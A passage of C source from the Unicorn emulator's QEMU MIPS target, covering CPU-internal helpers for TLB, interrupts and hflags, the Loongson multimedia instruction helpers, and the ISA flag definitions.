target_ulong address, int rw, int access_type); void (*helper_tlbwi)(struct CPUMIPSState *env); void (*helper_tlbwr)(struct CPUMIPSState *env); void (*helper_tlbp)(struct CPUMIPSState *env); void (*helper_tlbr)(struct CPUMIPSState *env); void (*helper_tlbinv)(struct CPUMIPSState *env); void (*helper_tlbinvf)(struct CPUMIPSState *env); union { struct { r4k_tlb_t tlb[MIPS_TLB_MAX]; } r4k; } mmu; }; int no_mmu_map_address(CPUMIPSState *env, hwaddr
*physical, int *prot, target_ulong address, int rw, int access_type); int fixed_mmu_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type); int r4k_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type); void r4k_helper_tlbwi(CPUMIPSState *env); void r4k_helper_tlbwr(CPUMIPSState *env); void r4k_helper_tlbp(CPUMIPSState *env); void r4k_helper_tlbr(CPUMIPSState *env); void r4k_helper_tlbinv(CPUMIPSState *env); void r4k_helper_tlbinvf(CPUMIPSState *env); void r4k_invalidate_tlb(CPUMIPSState *env, int idx, int use_extra); void mips_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); hwaddr cpu_mips_translate_address(CPUMIPSState *env, target_ulong address, int rw); #define cpu_signal_handler cpu_mips_signal_handler static inline bool cpu_mips_hw_interrupts_enabled(CPUMIPSState *env) { return (env->CP0_Status & (1 << CP0St_IE)) && !(env->CP0_Status & (1 << CP0St_EXL)) && !(env->CP0_Status & (1 << CP0St_ERL)) && !(env->hflags & MIPS_HFLAG_DM) && /* * Note that the TCStatus IXMT field is initialized to zero, * and only MT capable cores can set it to one. So we don't * need to check for MT capabilities here. */ !(env->active_tc.CP0_TCStatus & (1 << CP0TCSt_IXMT)); } /* Check if there is a pending interrupt that is not masked out */ static inline bool cpu_mips_hw_interrupts_pending(CPUMIPSState *env) { int32_t pending; int32_t status; bool r; pending = env->CP0_Cause & CP0Ca_IP_mask; status = env->CP0_Status & CP0Ca_IP_mask; if (env->CP0_Config3 & (1 << CP0C3_VEIC)) { /* * A MIPS configured with a vectorizing external interrupt controller * will feed a vector into the Cause pending lines. The core treats * the status lines as a vector level, not as individual masks. */ r = pending > status; } else { /* * A MIPS configured with compatibility or VInt (Vectored Interrupts) * treats the pending lines as individual interrupt lines, the status * lines are individual masks.
*/ r = (pending & status) != 0; } return r; } void mips_tcg_init(struct uc_struct *uc); /* TODO QOM'ify CPU reset and remove */ void cpu_state_reset(CPUMIPSState *s); void cpu_mips_realize_env(CPUMIPSState *env); /* cp0_timer.c */ uint32_t cpu_mips_get_random(CPUMIPSState *env); uint32_t cpu_mips_get_count(CPUMIPSState *env); void cpu_mips_store_count(CPUMIPSState *env, uint32_t value); void cpu_mips_store_compare(CPUMIPSState *env, uint32_t value); void cpu_mips_start_count(CPUMIPSState *env); void cpu_mips_stop_count(CPUMIPSState *env); /* helper.c */ bool mips_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); /* op_helper.c */ uint32_t float_class_s(uint32_t arg, float_status *fst); uint64_t float_class_d(uint64_t arg, float_status *fst); extern unsigned int ieee_rm[]; int ieee_ex_to_mips(int xcpt); void update_pagemask(CPUMIPSState *env, target_ulong arg1, int32_t *pagemask); static inline void restore_rounding_mode(CPUMIPSState *env) { set_float_rounding_mode(ieee_rm[env->active_fpu.fcr31 & 3], &env->active_fpu.fp_status); } static inline void restore_flush_mode(CPUMIPSState *env) { set_flush_to_zero((env->active_fpu.fcr31 & (1 << FCR31_FS)) != 0, &env->active_fpu.fp_status); } static inline void restore_snan_bit_mode(CPUMIPSState *env) { set_snan_bit_is_one((env->active_fpu.fcr31 & (1 << FCR31_NAN2008)) == 0, &env->active_fpu.fp_status); } static inline void restore_fp_status(CPUMIPSState *env) { restore_rounding_mode(env); restore_flush_mode(env); restore_snan_bit_mode(env); } static inline void restore_msa_fp_status(CPUMIPSState *env) { float_status *status = &env->active_tc.msa_fp_status; int rounding_mode = (env->active_tc.msacsr & MSACSR_RM_MASK) >> MSACSR_RM; bool flush_to_zero = (env->active_tc.msacsr & MSACSR_FS_MASK) != 0; set_float_rounding_mode(ieee_rm[rounding_mode], status); set_flush_to_zero(flush_to_zero, status); set_flush_inputs_to_zero(flush_to_zero, status); } static inline void restore_pamask(CPUMIPSState *env) { if (env->hflags & MIPS_HFLAG_ELPA) { env->PAMask = (1ULL << env->PABITS) - 1; } else { env->PAMask = PAMASK_BASE; } } static inline int mips_vpe_active(CPUMIPSState *env) { int active = 1; /* Check that the VPE is enabled. */ if (!(env->mvp->CP0_MVPControl & (1 << CP0MVPCo_EVP))) { active = 0; } /* Check that the VPE is activated. */ if (!(env->CP0_VPEConf0 & (1 << CP0VPEC0_VPA))) { active = 0; } /* * Now verify that there are active thread contexts in the VPE. * * This assumes the CPU model will internally reschedule threads * if the active one goes to sleep. If there are no threads available * the active one will be in a sleeping state, and we can turn off * the entire VPE. */ if (!(env->active_tc.CP0_TCStatus & (1 << CP0TCSt_A))) { /* TC is not activated. */ active = 0; } if (env->active_tc.CP0_TCHalt & 1) { /* TC is in halt state. 
static inline int mips_vpe_active(CPUMIPSState *env)
{
    int active = 1;

    /* Check that the VPE is enabled. */
    if (!(env->mvp->CP0_MVPControl & (1 << CP0MVPCo_EVP))) {
        active = 0;
    }
    /* Check that the VPE is activated. */
    if (!(env->CP0_VPEConf0 & (1 << CP0VPEC0_VPA))) {
        active = 0;
    }

    /*
     * Now verify that there are active thread contexts in the VPE.
     *
     * This assumes the CPU model will internally reschedule threads
     * if the active one goes to sleep. If there are no threads available
     * the active one will be in a sleeping state, and we can turn off
     * the entire VPE.
     */
    if (!(env->active_tc.CP0_TCStatus & (1 << CP0TCSt_A))) {
        /* TC is not activated. */
        active = 0;
    }
    if (env->active_tc.CP0_TCHalt & 1) {
        /* TC is in halt state. */
        active = 0;
    }

    return active;
}

static inline int mips_vp_active(CPUMIPSState *env, CPUState *cpu)
{
    /* Check if the VP disabled other VPs (which means the VP is enabled) */
    if ((env->CP0_VPControl >> CP0VPCtl_DIS) & 1) {
        return 1;
    }

    /* Check if the virtual processor is disabled due to a DVP */
    MIPSCPU *cs = MIPS_CPU(cpu);
    if ((&cs->env != env) &&
        ((cs->env.CP0_VPControl >> CP0VPCtl_DIS) & 1)) {
        return 0;
    }
    return 1;
}
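compute_hflags(), which follows, caches the current privilege mode and feature enables into env->hflags so the translator can test them cheaply. The mode selection itself is compact enough to show standalone (editor's addition; the constant and function names are hypothetical): KSU is Status bits 4..3 (0 = kernel, 1 = supervisor, 2 = user), and EXL or ERL pin the CPU in kernel mode.

/*
 * Illustrative sketch (editor's addition): the privilege-mode selection that
 * compute_hflags() below caches into env->hflags.
 */
#include <stdint.h>
#include <stdio.h>

#define ST_EXL (1u << 1)
#define ST_ERL (1u << 2)

static unsigned effective_mode(uint32_t status)
{
    if (status & (ST_EXL | ST_ERL)) {
        return 0; /* exception/error level pins the CPU in kernel mode */
    }
    return (status >> 3) & 3; /* the KSU field */
}

int main(void)
{
    printf("%u\n", effective_mode(0x10)); /* KSU = 2 -> user mode */
    printf("%u\n", effective_mode(0x12)); /* EXL set -> kernel mode */
    return 0;
}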
static inline void compute_hflags(CPUMIPSState *env)
{
    env->hflags &= ~(MIPS_HFLAG_COP1X | MIPS_HFLAG_64 | MIPS_HFLAG_CP0 |
                     MIPS_HFLAG_F64 | MIPS_HFLAG_FPU | MIPS_HFLAG_KSU |
                     MIPS_HFLAG_AWRAP | MIPS_HFLAG_DSP | MIPS_HFLAG_DSP_R2 |
                     MIPS_HFLAG_DSP_R3 | MIPS_HFLAG_SBRI | MIPS_HFLAG_MSA |
                     MIPS_HFLAG_FRE | MIPS_HFLAG_ELPA | MIPS_HFLAG_ERL);
    if (env->CP0_Status & (1 << CP0St_ERL)) {
        env->hflags |= MIPS_HFLAG_ERL;
    }
    if (!(env->CP0_Status & (1 << CP0St_EXL)) &&
        !(env->CP0_Status & (1 << CP0St_ERL)) &&
        !(env->hflags & MIPS_HFLAG_DM)) {
        env->hflags |= (env->CP0_Status >> CP0St_KSU) & MIPS_HFLAG_KSU;
    }
#if defined(TARGET_MIPS64)
    if ((env->insn_flags & ISA_MIPS3) &&
        (((env->hflags & MIPS_HFLAG_KSU) != MIPS_HFLAG_UM) ||
         (env->CP0_Status & (1 << CP0St_PX)) ||
         (env->CP0_Status & (1 << CP0St_UX)))) {
        env->hflags |= MIPS_HFLAG_64;
    }
    if (!(env->insn_flags & ISA_MIPS3)) {
        env->hflags |= MIPS_HFLAG_AWRAP;
    } else if (((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_UM) &&
               !(env->CP0_Status & (1 << CP0St_UX))) {
        env->hflags |= MIPS_HFLAG_AWRAP;
    } else if (env->insn_flags & ISA_MIPS64R6) {
        /* Address wrapping for Supervisor and Kernel is specified in R6 */
        if ((((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_SM) &&
             !(env->CP0_Status & (1 << CP0St_SX))) ||
            (((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_KM) &&
             !(env->CP0_Status & (1 << CP0St_KX)))) {
            env->hflags |= MIPS_HFLAG_AWRAP;
        }
    }
#endif
    if (((env->CP0_Status & (1 << CP0St_CU0)) &&
         !(env->insn_flags & ISA_MIPS32R6)) ||
        !(env->hflags & MIPS_HFLAG_KSU)) {
        env->hflags |= MIPS_HFLAG_CP0;
    }
    if (env->CP0_Status & (1 << CP0St_CU1)) {
        env->hflags |= MIPS_HFLAG_FPU;
    }
    if (env->CP0_Status & (1 << CP0St_FR)) {
        env->hflags |= MIPS_HFLAG_F64;
    }
    if (((env->hflags & MIPS_HFLAG_KSU) != MIPS_HFLAG_KM) &&
        (env->CP0_Config5 & (1 << CP0C5_SBRI))) {
        env->hflags |= MIPS_HFLAG_SBRI;
    }
    if (env->insn_flags & ASE_DSP_R3) {
        /*
         * Our cpu supports DSP R3 ASE, so enable
         * access to DSP R3 resources.
         */
        if (env->CP0_Status & (1 << CP0St_MX)) {
            env->hflags |= MIPS_HFLAG_DSP | MIPS_HFLAG_DSP_R2 |
                           MIPS_HFLAG_DSP_R3;
        }
    } else if (env->insn_flags & ASE_DSP_R2) {
        /*
         * Our cpu supports DSP R2 ASE, so enable
         * access to DSP R2 resources.
         */
        if (env->CP0_Status & (1 << CP0St_MX)) {
            env->hflags |= MIPS_HFLAG_DSP | MIPS_HFLAG_DSP_R2;
        }
    } else if (env->insn_flags & ASE_DSP) {
        /*
         * Our cpu supports DSP ASE, so enable
         * access to DSP resources.
         */
        if (env->CP0_Status & (1 << CP0St_MX)) {
            env->hflags |= MIPS_HFLAG_DSP;
        }
    }
    if (env->insn_flags & ISA_MIPS32R2) {
        if (env->active_fpu.fcr0 & (1 << FCR0_F64)) {
            env->hflags |= MIPS_HFLAG_COP1X;
        }
    } else if (env->insn_flags & ISA_MIPS32) {
        if (env->hflags & MIPS_HFLAG_64) {
            env->hflags |= MIPS_HFLAG_COP1X;
        }
    } else if (env->insn_flags & ISA_MIPS4) {
        /*
         * All supported MIPS IV CPUs use the XX (CU3) to enable
         * and disable the MIPS IV extensions to the MIPS III ISA.
         * Some other MIPS IV CPUs ignore the bit, so the check here
         * would be too restrictive for them.
         */
        if (env->CP0_Status & (1U << CP0St_CU3)) {
            env->hflags |= MIPS_HFLAG_COP1X;
        }
    }
    if (env->insn_flags & ASE_MSA) {
        if (env->CP0_Config5 & (1 << CP0C5_MSAEn)) {
            env->hflags |= MIPS_HFLAG_MSA;
        }
    }
    if (env->active_fpu.fcr0 & (1 << FCR0_FREP)) {
        if (env->CP0_Config5 & (1 << CP0C5_FRE)) {
            env->hflags |= MIPS_HFLAG_FRE;
        }
    }
    if (env->CP0_Config3 & (1 << CP0C3_LPA)) {
        if (env->CP0_PageGrain & (1 << CP0PG_ELPA)) {
            env->hflags |= MIPS_HFLAG_ELPA;
        }
    }
}

void cpu_mips_tlb_flush(CPUMIPSState *env);
void sync_c0_status(CPUMIPSState *env, CPUMIPSState *cpu, int tc);
void cpu_mips_store_status(CPUMIPSState *env, target_ulong val);
void cpu_mips_store_cause(CPUMIPSState *env, target_ulong val);

void QEMU_NORETURN do_raise_exception_err(CPUMIPSState *env, uint32_t exception,
                                          int error_code, uintptr_t pc);

static inline void QEMU_NORETURN do_raise_exception(CPUMIPSState *env,
                                                    uint32_t exception,
                                                    uintptr_t pc)
{
    do_raise_exception_err(env, exception, 0, pc);
}

#endif

unicorn-2.1.1/qemu/target/mips/lmi_helper.c

/*
 * Loongson Multimedia Instruction emulation helpers for QEMU.
 *
 * Copyright (c) 2011 Richard Henderson <rth@twiddle.net>
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/helper-proto.h"

/*
 * If the byte ordering doesn't matter, i.e. all columns are treated
 * identically, then this union can be used directly. If byte ordering
 * does matter, we generally ignore dumping to memory.
 */
typedef union {
    uint8_t ub[8];
    int8_t sb[8];
    uint16_t uh[4];
    int16_t sh[4];
    uint32_t uw[2];
    int32_t sw[2];
    uint64_t d;
} LMIValue;

/* Some byte ordering issues can be mitigated by XORing in the following. */
#ifdef HOST_WORDS_BIGENDIAN
# define BYTE_ORDER_XOR(N) N
#else
# define BYTE_ORDER_XOR(N) 0
#endif

#define SATSB(x) (x < -0x80 ? -0x80 : x > 0x7f ? 0x7f : x)
#define SATUB(x) (x > 0xff ? 0xff : x)

#define SATSH(x) (x < -0x8000 ? -0x8000 : x > 0x7fff ? 0x7fff : x)
#define SATUH(x) (x > 0xffff ? 0xffff : x)

#define SATSW(x) \
    (x < -0x80000000ll ? -0x80000000ll : x > 0x7fffffff ? 0x7fffffff : x)
#define SATUW(x) (x > 0xffffffffull ?
0xffffffffull : x) uint64_t helper_paddsb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.sb[i] + vt.sb[i]; vs.sb[i] = SATSB(r); } return vs.d; } uint64_t helper_paddusb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.ub[i] + vt.ub[i]; vs.ub[i] = SATUB(r); } return vs.d; } uint64_t helper_paddsh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int r = vs.sh[i] + vt.sh[i]; vs.sh[i] = SATSH(r); } return vs.d; } uint64_t helper_paddush(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int r = vs.uh[i] + vt.uh[i]; vs.uh[i] = SATUH(r); } return vs.d; } uint64_t helper_paddb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { vs.ub[i] += vt.ub[i]; } return vs.d; } uint64_t helper_paddh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { vs.uh[i] += vt.uh[i]; } return vs.d; } uint64_t helper_paddw(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 2; ++i) { vs.uw[i] += vt.uw[i]; } return vs.d; } uint64_t helper_psubsb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.sb[i] - vt.sb[i]; vs.sb[i] = SATSB(r); } return vs.d; } uint64_t helper_psubusb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.ub[i] - vt.ub[i]; vs.ub[i] = SATUB(r); } return vs.d; } uint64_t helper_psubsh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int r = vs.sh[i] - vt.sh[i]; vs.sh[i] = SATSH(r); } return vs.d; } uint64_t helper_psubush(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int r = vs.uh[i] - vt.uh[i]; vs.uh[i] = SATUH(r); } return vs.d; } uint64_t helper_psubb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { vs.ub[i] -= vt.ub[i]; } return vs.d; } uint64_t helper_psubh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { vs.uh[i] -= vt.uh[i]; } return vs.d; } uint64_t helper_psubw(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 2; ++i) { vs.uw[i] -= vt.uw[i]; } return vs.d; } uint64_t helper_pshufh(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(3); LMIValue vd, vs; unsigned i; vs.d = fs; vd.d = 0; for (i = 0; i < 4; i++, ft >>= 2) { vd.uh[i ^ host] = vs.uh[(ft & 3) ^ host]; } return vd.d; } uint64_t helper_packsswh(uint64_t fs, uint64_t ft) { uint64_t fd = 0; int64_t tmp; tmp = (int32_t)(fs >> 0); tmp = SATSH(tmp); fd |= (tmp & 0xffff) << 0; tmp = (int32_t)(fs >> 32); tmp = SATSH(tmp); fd |= (tmp & 0xffff) << 16; tmp = (int32_t)(ft >> 0); tmp = SATSH(tmp); fd |= (tmp & 0xffff) << 32; tmp = (int32_t)(ft >> 32); tmp = SATSH(tmp); fd |= (tmp & 0xffff) << 48; return fd; } uint64_t helper_packsshb(uint64_t fs, uint64_t ft) { uint64_t fd = 0; unsigned int i; for (i = 0; i < 4; ++i) { int16_t tmp = fs >> (i * 16); tmp = SATSB(tmp); fd |= (uint64_t)(tmp & 0xff) << (i * 8); } for (i = 0; i < 4; ++i) { int16_t tmp = ft >> (i * 16); tmp = SATSB(tmp); fd |= (uint64_t)(tmp & 
0xff) << (i * 8 + 32); } return fd; } uint64_t helper_packushb(uint64_t fs, uint64_t ft) { uint64_t fd = 0; unsigned int i; for (i = 0; i < 4; ++i) { int16_t tmp = fs >> (i * 16); tmp = SATUB(tmp); fd |= (uint64_t)(tmp & 0xff) << (i * 8); } for (i = 0; i < 4; ++i) { int16_t tmp = ft >> (i * 16); tmp = SATUB(tmp); fd |= (uint64_t)(tmp & 0xff) << (i * 8 + 32); } return fd; } uint64_t helper_punpcklwd(uint64_t fs, uint64_t ft) { return (fs & 0xffffffff) | (ft << 32); } uint64_t helper_punpckhwd(uint64_t fs, uint64_t ft) { return (fs >> 32) | (ft & ~0xffffffffull); } uint64_t helper_punpcklhw(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(3); LMIValue vd, vs, vt; vs.d = fs; vt.d = ft; vd.uh[0 ^ host] = vs.uh[0 ^ host]; vd.uh[1 ^ host] = vt.uh[0 ^ host]; vd.uh[2 ^ host] = vs.uh[1 ^ host]; vd.uh[3 ^ host] = vt.uh[1 ^ host]; return vd.d; } uint64_t helper_punpckhhw(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(3); LMIValue vd, vs, vt; vs.d = fs; vt.d = ft; vd.uh[0 ^ host] = vs.uh[2 ^ host]; vd.uh[1 ^ host] = vt.uh[2 ^ host]; vd.uh[2 ^ host] = vs.uh[3 ^ host]; vd.uh[3 ^ host] = vt.uh[3 ^ host]; return vd.d; } uint64_t helper_punpcklbh(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(7); LMIValue vd, vs, vt; vs.d = fs; vt.d = ft; vd.ub[0 ^ host] = vs.ub[0 ^ host]; vd.ub[1 ^ host] = vt.ub[0 ^ host]; vd.ub[2 ^ host] = vs.ub[1 ^ host]; vd.ub[3 ^ host] = vt.ub[1 ^ host]; vd.ub[4 ^ host] = vs.ub[2 ^ host]; vd.ub[5 ^ host] = vt.ub[2 ^ host]; vd.ub[6 ^ host] = vs.ub[3 ^ host]; vd.ub[7 ^ host] = vt.ub[3 ^ host]; return vd.d; } uint64_t helper_punpckhbh(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(7); LMIValue vd, vs, vt; vs.d = fs; vt.d = ft; vd.ub[0 ^ host] = vs.ub[4 ^ host]; vd.ub[1 ^ host] = vt.ub[4 ^ host]; vd.ub[2 ^ host] = vs.ub[5 ^ host]; vd.ub[3 ^ host] = vt.ub[5 ^ host]; vd.ub[4 ^ host] = vs.ub[6 ^ host]; vd.ub[5 ^ host] = vt.ub[6 ^ host]; vd.ub[6 ^ host] = vs.ub[7 ^ host]; vd.ub[7 ^ host] = vt.ub[7 ^ host]; return vd.d; } uint64_t helper_pavgh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.uh[i] = (vs.uh[i] + vt.uh[i] + 1) >> 1; } return vs.d; } uint64_t helper_pavgb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; i++) { vs.ub[i] = (vs.ub[i] + vt.ub[i] + 1) >> 1; } return vs.d; } uint64_t helper_pmaxsh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.sh[i] = (vs.sh[i] >= vt.sh[i] ? vs.sh[i] : vt.sh[i]); } return vs.d; } uint64_t helper_pminsh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.sh[i] = (vs.sh[i] <= vt.sh[i] ? vs.sh[i] : vt.sh[i]); } return vs.d; } uint64_t helper_pmaxub(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.ub[i] = (vs.ub[i] >= vt.ub[i] ? vs.ub[i] : vt.ub[i]); } return vs.d; } uint64_t helper_pminub(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.ub[i] = (vs.ub[i] <= vt.ub[i] ? 
vs.ub[i] : vt.ub[i]); } return vs.d; } uint64_t helper_pcmpeqw(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 2; i++) { vs.uw[i] = -(vs.uw[i] == vt.uw[i]); } return vs.d; } uint64_t helper_pcmpgtw(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 2; i++) { vs.uw[i] = -(vs.uw[i] > vt.uw[i]); } return vs.d; } uint64_t helper_pcmpeqh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.uh[i] = -(vs.uh[i] == vt.uh[i]); } return vs.d; } uint64_t helper_pcmpgth(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.uh[i] = -(vs.uh[i] > vt.uh[i]); } return vs.d; } uint64_t helper_pcmpeqb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; i++) { vs.ub[i] = -(vs.ub[i] == vt.ub[i]); } return vs.d; } uint64_t helper_pcmpgtb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; i++) { vs.ub[i] = -(vs.ub[i] > vt.ub[i]); } return vs.d; } uint64_t helper_psllw(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 31) { return 0; } vs.d = fs; for (i = 0; i < 2; ++i) { vs.uw[i] <<= ft; } return vs.d; } uint64_t helper_psrlw(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 31) { return 0; } vs.d = fs; for (i = 0; i < 2; ++i) { vs.uw[i] >>= ft; } return vs.d; } uint64_t helper_psraw(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 31) { ft = 31; } vs.d = fs; for (i = 0; i < 2; ++i) { vs.sw[i] >>= ft; } return vs.d; } uint64_t helper_psllh(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 15) { return 0; } vs.d = fs; for (i = 0; i < 4; ++i) { vs.uh[i] <<= ft; } return vs.d; } uint64_t helper_psrlh(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 15) { return 0; } vs.d = fs; for (i = 0; i < 4; ++i) { vs.uh[i] >>= ft; } return vs.d; } uint64_t helper_psrah(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 15) { ft = 15; } vs.d = fs; for (i = 0; i < 4; ++i) { vs.sh[i] >>= ft; } return vs.d; } uint64_t helper_pmullh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { vs.sh[i] *= vt.sh[i]; } return vs.d; } uint64_t helper_pmulhh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int32_t r = vs.sh[i] * vt.sh[i]; vs.sh[i] = r >> 16; } return vs.d; } uint64_t helper_pmulhuh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { uint32_t r = vs.uh[i] * vt.uh[i]; vs.uh[i] = r >> 16; } return vs.d; } uint64_t helper_pmaddhw(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(3); LMIValue vs, vt; uint32_t p0, p1; vs.d = fs; vt.d = ft; p0 = vs.sh[0 ^ host] * vt.sh[0 ^ host]; p0 += vs.sh[1 ^ host] * vt.sh[1 ^ host]; p1 = vs.sh[2 ^ host] * vt.sh[2 ^ host]; p1 += vs.sh[3 ^ host] * vt.sh[3 ^ host]; return ((uint64_t)p1 << 32) | p0; } uint64_t helper_pasubub(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.ub[i] - vt.ub[i]; vs.ub[i] = (r < 0 ? 
-r : r);
    }
    return vs.d;
}

uint64_t helper_biadd(uint64_t fs)
{
    unsigned i, fd;

    for (i = fd = 0; i < 8; ++i) {
        fd += (fs >> (i * 8)) & 0xff;
    }
    return fd & 0xffff;
}

uint64_t helper_pmovmskb(uint64_t fs)
{
    unsigned fd = 0;

    fd |= ((fs >> 7) & 1) << 0;
    fd |= ((fs >> 15) & 1) << 1;
    fd |= ((fs >> 23) & 1) << 2;
    fd |= ((fs >> 31) & 1) << 3;
    fd |= ((fs >> 39) & 1) << 4;
    fd |= ((fs >> 47) & 1) << 5;
    fd |= ((fs >> 55) & 1) << 6;
    fd |= ((fs >> 63) & 1) << 7;
    return fd & 0xff;
}

unicorn-2.1.1/qemu/target/mips/mips-defs.h

#ifndef QEMU_MIPS_DEFS_H
#define QEMU_MIPS_DEFS_H

/*
 * If we want to use host float regs...
 *
 * #define USE_HOST_FLOAT_REGS
 */

/* Real pages are variable size... */
#define MIPS_TLB_MAX 128

/*
 * bit definitions for insn_flags (ISAs/ASEs flags)
 * ------------------------------------------------
 */
/*
 * bits 0-31: MIPS base instruction sets
 */
#define ISA_MIPS1         0x0000000000000001ULL
#define ISA_MIPS2         0x0000000000000002ULL
#define ISA_MIPS3         0x0000000000000004ULL
#define ISA_MIPS4         0x0000000000000008ULL
#define ISA_MIPS5         0x0000000000000010ULL
#define ISA_MIPS32        0x0000000000000020ULL
#define ISA_MIPS32R2      0x0000000000000040ULL
#define ISA_MIPS64        0x0000000000000080ULL
#define ISA_MIPS64R2      0x0000000000000100ULL
#define ISA_MIPS32R3      0x0000000000000200ULL
#define ISA_MIPS64R3      0x0000000000000400ULL
#define ISA_MIPS32R5      0x0000000000000800ULL
#define ISA_MIPS64R5      0x0000000000001000ULL
#define ISA_MIPS32R6      0x0000000000002000ULL
#define ISA_MIPS64R6      0x0000000000004000ULL
#define ISA_NANOMIPS32    0x0000000000008000ULL

/*
 * bits 32-47: MIPS ASEs
 */
#define ASE_MIPS16        0x0000000100000000ULL
#define ASE_MIPS3D        0x0000000200000000ULL
#define ASE_MDMX          0x0000000400000000ULL
#define ASE_DSP           0x0000000800000000ULL
#define ASE_DSP_R2        0x0000001000000000ULL
#define ASE_DSP_R3        0x0000002000000000ULL
#define ASE_MT            0x0000004000000000ULL
#define ASE_SMARTMIPS     0x0000008000000000ULL
